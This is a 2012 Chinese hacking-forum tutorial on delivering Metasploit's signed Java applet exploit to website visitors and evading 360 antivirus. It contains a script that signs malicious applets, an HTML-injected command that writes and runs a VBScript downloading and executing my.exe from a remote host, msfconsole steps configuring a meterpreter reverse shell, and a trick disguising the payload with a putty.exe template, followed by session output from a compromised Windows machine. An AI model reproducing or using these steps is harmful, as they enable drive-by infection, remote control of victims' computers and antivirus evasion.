切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
178 : Metasploit Java Applet 免杀[复制链接]
发表于 2012-10-2 15:42:35 | 显示全部楼层 |!read_mode!

威宝最近发邮件来问 Metasploit的 Java Applet ,这可能是以后浏览器类型不安全因素的主流,目前防止他1是杀毒软件,2是SSL,对于证书很好解决,但是对于杀毒软件就麻烦了

什么是Java Applet

JavaApplet就是用Java语言编写的小应用程序,可以直接嵌入到网页中,并能够产生特殊的效果.  Applet可以翻译为小应用程序,Java Applet就是用Java语言编写的这样的一些小应用程序,它们可以直接嵌入到网页中,并能够产生特殊的效果。包含Applet的网页被称为Java-powered页,可以称其为Java支持的网页。   当用户访问这样的网页时, Applet被下载到用户的计算机上执行,但前提是用户使用的是支持Java的网络l浏览器。由于Applet是在用户的计算机上执行的,因此它的执行速度不受网络带宽或者Modem存取速度的限制。用户可以更好地欣赏网页上Applet产生的多媒体效果。   在Java Applet中,可以实现图形绘制,字体和颜色控制,动画和声音的插入,人机交互及网络交流等功能。 Applet还提供了名为抽象窗口工具箱(Abstract Window Toolkit, AWT)的窗口环境开发工具。 AWT利用用户计算机的GUI元素,可以建立标准的图形用户界面,如窗口、按钮、滚动条等等。目前,在网络上有非常多的Applet范例来生动地展现这些功能,读者可以去调阅相应的网页以观看它们的效果。 <BR>Applet的工作原理.   含有Applet的网页的HTML文件代码中部带有<applet> 和</applet>这样一对标记,当支持Java的网络浏览器遇到这对标记时,就将下载相应的小应用程序代码并在本地计算机上执行该Applet。

Java Applet攻击

在applet的执行环境下可能发生的有:
读文件 写文件 执行 跨域取东西 跨域通知 跨域建立socket链接 调用外部引擎(JDBC等) 调用APPLET外的JAVA代码 控制浏览器做一些不合理动作
这东西是跨平台的,Linux Windows Mac等等 ,徒儿 7h1nkz3r0在这里写了个文章,你可以看一下 http://51root.net/archives/65,或者可以看下这个视频,这个是教程文档177课程的,自行翻看


攻击原理对于攻击原理你可以看下下面的一个BASH文件:

  1. #!/bin/bash
  2. #
  3. # Shell script to sign a Java Applet
  4. # Joshua "Jabra" Abraham
  5. # Tue Jun 30 02:26:36 EDT 2009
  6. #
  7. # 1. Compile the Applet source code to an executable class.
  8. #
  9. # javac HelloWorld.java
  10. #
  11. # 2. Package the compiled class into a JAR file.
  12. #
  13. # jar cvf HelloWorld.jar HelloWorld.class
  14. #
  15. # 3. Generate key pairs.
  16. #
  17. # keytool genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
  18. #
  19. # 4. Sign the JAR file.
  20. #
  21. # jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass - signedjar SignedHelloWorld.jar
  22. # HelloWorld.jar signapplet
  23. #
  24. # 5. Export the public key certificate.
  25. #
  26. # keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
  27. #
  28. # 6. Deploy the JAR and the class file.
  29. #
  30. # <applet code="HelloWorld.class" archive="SignedHelloWorld.jar" width=1 height=1> </applet>
  31. #
  32. echo "Enter the name of the applet without the extension:"
  33. read NAMEjavac $NAME.javaif [ $? -eq 1 ] ; then
  34. echo "Error with javac"
  35. exit
  36. fi

  37. echo "[+] Packaging the compiled class into a JAR file"
  38. jar cf $NAME.jar $NAME.class
  39. if [ $? -eq 1 ] ; then
  40. echo "Error with jar"
  41. exit
  42. fi

  43. echo "[+] Generating key pairs"
  44. keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
  45. if [ $? -eq 1 ] ; then
  46. echo "Error with generating the key pair"
  47. exit
  48. fi

  49. echo "[+] Signing the JAR file"
  50. jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar "Signed$NAME.jar" $NAME.jar signapplet
  51. if [ $? -eq 1 ] ; then
  52. echo "Error with signing the jar"
  53. exit
  54. fi

  55. echo "[+] Exporting the public key certificate"
  56. keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
  57. if [ $? -eq 1 ] ; then
  58. echo "Error with exporting the public key"
  59. exit
  60. fi
  61. echo "[+] Done"
  62. sleep 1
  63. echo ""
  64. echo ""
  65. echo "Deploy the JAR and certificate files. They should be deployed to a directory on a Web server."
  66. echo ""
  67. echo "<applet width='1' height='1' code='$NAME.class' archive='Signed$NAME.jar'> "
  68. echo ""
复制代码
Html的镶入:
  1. root@bt:~# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > /var/www/index.html

  2. root@bt:~# echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > \
  3. C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs \
  4. & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> \
  5. C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & \
  6. echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> \
  7. C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> \
  8. C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> \
  9. C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & \
  10. echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & \
  11. echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & \
  12. echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> \
  13. C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe'> </applet>" >> \
  14. /var/www/index.html
复制代码
嗯,很简单关于免杀你先阅读这个文章:http://www.3g-sec.com/thread-690-1-1.html
  1. msf > use exploit/multi/browser/java_signed_applet
  2. msf  exploit(java_signed_applet) > show targets

  3. Exploit targets:

  4.    Id  Name
  5.    --  ----
  6.    0   Generic (Java Payload)
  7.    1   Windows x86 (Native Payload)
  8.    2   Linux x86 (Native Payload)
  9.    3   Mac OS X PPC (Native Payload)
  10.    4   Mac OS X x86 (Native Payload)

  11. msf  exploit(java_signed_applet) > set TARGET 1
  12. TARGET => 1
  13. msf  exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
  14. PAYLOAD => windows/meterpreter/reverse_tcp
  15. msf  exploit(java_signed_applet) > set LHOST 5.5.5.2
  16. LHOST => 5.5.5.2
  17. msf  exploit(java_signed_applet) > set URIPATH /
  18. URIPATH => /
  19. msf  exploit(java_signed_applet) > exploit
  20. [*] Exploit running as background job.
  21. msf  exploit(java_signed_applet) >
  22. [*] Started reverse handler on 5.5.5.2:4444
  23. [*] Using URL: http://0.0.0.0:8080/
  24. [*]  Local IP: http://10.0.3.15:8080/
  25. [*] Server started.
复制代码
围观下源码
  1. root@Dis9Team:~# wget 5.5.5.2:8080 -O /tmp/1; cat /tmp/1
  2. --2012-07-12 06:25:45--  http://5.5.5.2:8080/
  3. Connecting to 5.5.5.2:8080... connected.
  4. HTTP request sent, awaiting response... 200 OK
  5. Length: 212 [text/html]
  6. Saving to: `/tmp/1'

  7. 100%[==========================================================================>] 212         --.-K/s   in 0s      

  8. 2012-07-12 06:25:45 (12.7 MB/s) - `/tmp/1' saved [212/212]

  9. <html><head><title>Loading, Please Wait...</title></head>
  10. <body><center><p>Loading, Please Wait...</p></center>
  11. <applet archive="/SiteLoader.jar"
  12.   code="SiteLoader" width="1" height="1">
  13. </applet>
  14. </body></html>root@Dis9Team:~#
复制代码
似乎很简单,当安全了360安全卫士,他能弹出java运行程序
但是点击确定后被杀了

Metasploit控制台无SHELL
  1. msf  exploit(java_signed_applet) >
  2. [*] Started reverse handler on 5.5.5.2:4444
  3. [*] Using URL: http://0.0.0.0:8080/
  4. [*]  Local IP: http://10.0.3.15:8080/
  5. [*] Server started.
  6. [*] 5.5.5.2          java_signed_applet - Handling request
  7. [*] 5.5.5.3          java_signed_applet - Handling request
  8. [*] 5.5.5.3          java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
  9. [*] 5.5.5.3          java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
  10. [*] 5.5.5.3          java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
复制代码
先取消监听
  1. msf  exploit(java_signed_applet) > jobs

  2. Jobs
  3. ====

  4.   Id  Name
  5.   --  ----
  6.   0   Exploit: multi/browser/java_signed_applet

  7. msf  exploit(java_signed_applet) > kill 0
复制代码
换个方法,随着Linux在服务器端应用的普及,Linux系统管理越来越依赖于远程。在各种远程登录工具中,Putty是出色的工具之一。今天的猪脚是他
  1. msf  exploit(java_signed_applet) > set EXE::Template /tmp/putty.exe
  2. EXE::Template => /tmp/putty.exe
  3. msf  exploit(java_signed_applet) > exploit
  4. [*] Exploit running as background job.

  5. [*] Started reverse handler on 5.5.5.2:4444
复制代码
当我们再运行的时候,360没提示了
  1. meterpreter > getuid
  2. Server username: WWWDIS9COM\brk
  3. meterpreter > getpid
  4. Current pid: 1812
复制代码
看下进程
  1. meterpreter > ps

  2. Process List
  3. ============

  4. PID   PPID  Name               Arch  Session     User                 Path
  5. ---   ----  ----               ----  -------     ----                 ----
  6. 0     0     [System Process]         4294967295                       
  7. 4     0     System             x86   0                                
  8. 116   3132  firefox.exe        x86   0           WWWDIS9COM\brk       C:\Program Files\Mozilla Firefox\firefox.exe
  9. 268   656   VBoxTray.exe       x86   0           WWWDIS9COM\brk       C:\WINDOWS\system32\VBoxTray.exe
  10. 296   852   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
  11. 540   852   jqs.exe            x86   0           NT AUTHORITY\SYSTEM  C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jqs.exe
  12. 608   656   IEXPLORE.EXE       x86   0           WWWDIS9COM\brk       C:\Program Files\Internet Explorer\iexplore.exe
  13. 656   608   explorer.exe       x86   0           WWWDIS9COM\brk       C:\WINDOWS\Explorer.EXE
  14. 700   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
  15. 776   700   csrss.exe          x86   0           NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
  16. 800   700   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
  17. 852   800   services.exe       x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
  18. 864   800   lsass.exe          x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
  19. 868   656   jusched.exe        x86   0           WWWDIS9COM\brk       C:\Program Files\Common Files\Java\Java Update\jusched.exe
  20. 1024  852   VBoxService.exe    x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\VBoxService.exe
  21. 1040  656   360Tray.exe        x86   0           WWWDIS9COM\brk       C:\Program Files\360\360Safe\safemon\360Tray.exe
  22. 1076  852   svchost.exe        x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
  23. 1092  656   ctfmon.exe         x86   0           WWWDIS9COM\brk       C:\WINDOWS\system32\ctfmon.exe
  24. 1188  852   svchost.exe        x86   0                                C:\WINDOWS\system32\svchost.exe
  25. 1436  852   svchost.exe        x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
  26. 1612  852   svchost.exe        x86   0                                C:\WINDOWS\system32\svchost.exe
  27. 1812  2252  WKsBZRuT.exe       x86   0           WWWDIS9COM\brk       C:\Documents and Settings\brk\Local Settings\Temp\~spawn8513769975367034359.tmp.dir\WKsBZRuT.exe
  28. 1872  852   svchost.exe        x86   0                                C:\WINDOWS\system32\svchost.exe
  29. 1988  852   ZhuDongFangYu.exe  x86   0           NT AUTHORITY\SYSTEM  C:\Program Files\360\360Safe\deepscan\zhudongfangyu.exe
  30. 2152  852   alg.exe            x86   0                                C:\WINDOWS\System32\alg.exe
  31. 2452  3512  360leakfixer.exe   x86   0           WWWDIS9COM\brk       C:\Program Files\360\360Safe\360leakfixer.exe
  32. 2644  1436  wscntfy.exe        x86   0           WWWDIS9COM\brk       C:\WINDOWS\system32\wscntfy.exe
  33. 2884  3168  conime.exe         x86   0           WWWDIS9COM\brk       C:\WINDOWS\system32\conime.exe
  34. 3024  116   java.exe           x86   0           WWWDIS9COM\brk       C:\Program Files\Java\jre7\bin\java.exe
  35. 3292  1040  360netman.exe      x86   0           WWWDIS9COM\brk       C:\Program Files\360\360Safe\netmon\360netman.exe
  36. 3512  1040  360Safe.exe        x86   0           WWWDIS9COM\brk       C:\Program Files\360\360Safe\360Safe.exe
  37. 3764  3512  DSMain.exe         x86   0           WWWDIS9COM\brk       C:\Program Files\360\360Safe\deepscan\DSMain.exe


  38. meterpreter >
复制代码
嗯 360没挂
3024 116 java.exe x86 0 WWWDIS9COM\brk C:\Program Files\Java\jre7\bin\java.exe
3292 1040 360netman.exe x86 0 WWWDIS9COM\brk C:\Program Files\360\360Safe\netmon\360netman.exe
3512 1040 360Safe.exe x86 0 WWWDIS9COM\brk C:\Program Files\360\360Safe\360Safe.exe
3764 3512 DSMain.exe x86 0 WWWDIS9COM\brk C:\Program Files\360\360Safe\deepscan\DSMain.exe
只是输入ps后360杀了SHELL进程

METASPLOIT监听中断
  1. meterpreter >
  2. [*] Meterpreter session 1 closed.  Reason: Died
复制代码

当然最好用set,里面自带了凯文大神写的某东西,过金山 360



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-27 23:46

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部